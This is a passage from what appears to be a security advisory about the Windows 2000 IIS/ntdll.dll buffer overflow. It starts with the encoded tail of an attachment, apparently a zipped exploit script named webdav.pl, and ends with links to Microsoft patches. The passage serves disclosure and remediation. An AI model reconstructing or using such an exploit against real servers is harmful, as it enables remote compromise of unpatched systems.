	M3H]"B=5J>9/^0G4>[I?7;G.[/S[[[G(:6-)'<NC9<ATZE-IOUD>C'-1\)/F5
	M>N/NEOLTI3Q\_>?OWS]]^>K'#V<7_^FVU]<1W,$W>HY>/_KI3Y=__N\7YX]>
	MAZYU^?K\U8NG/SX*.=QL-_N-AG=WCWZW-S>_._[U5W+<_/KK%,DL"%3O@5VZ
	MHT7ZXD\PST:OW/5N`851*[6]/CI4(D*A8<:>$'*^4>;_EZV@%)SG:%(!;/,:
	MH7@<XDM->%:'F&6@"<LL#IG@"AQT3A'8,$UK!94:6T-K1#(#!ZHU0B^*.Z"9
	MR2;83K,:GJ!AH:9@:ZM@B)*@DT&'\"B`;('P84$0`C%2"2FA*Q24%F>`G*>C
	MH!(/CW]4]\,<'>+B'QH"$0+;`+,`:GQ6?F:>@KJZ#LRO$(!(C=CT0,H*Y.0&
	MBG!(4D,D"W`X(7NJ%M*$X.4"`%!+`0(4`!0````(`#"8>BY<3@`9!!4``#Y+
	M```)``````````$`(`````````!W96)D878N<&Q02P4&``````$``0`W````
	&*Q4`````
	`
	end
	5496 bytes
	
SOLUTION
	Windows 2000: Registry Tool for  Security  Patch:  Unchecked  buffer  in
	Windows component could cause web server compromise
	
	http://www.microsoft.com/downloads/details.aspx?FamilyID=48b3a74e-a4af-41d6-bdec-1b6104648647&DisplayLang=en
	
	Windows  2000:  Active  Directory  Group  Policy  for  Security   Patch:
	Unchecked buffer in Windows component could cause web server compr
	
	http://www.microsoft.com/downloads/details.aspx?FamilyID=a3b109d3-6f0e-4b1c-a723-976566fc1b53&DisplayLang=en
	
	Windows  2000  Security  Patch:  IIS  Remote  Exploit   from   ntdll.dll
	vulnerability
	
	http://www.microsoft.com/downloads/details.aspx?FamilyID=c9a38d45-5145-4844-b62e-c69d32ac929b&DisplayLang=en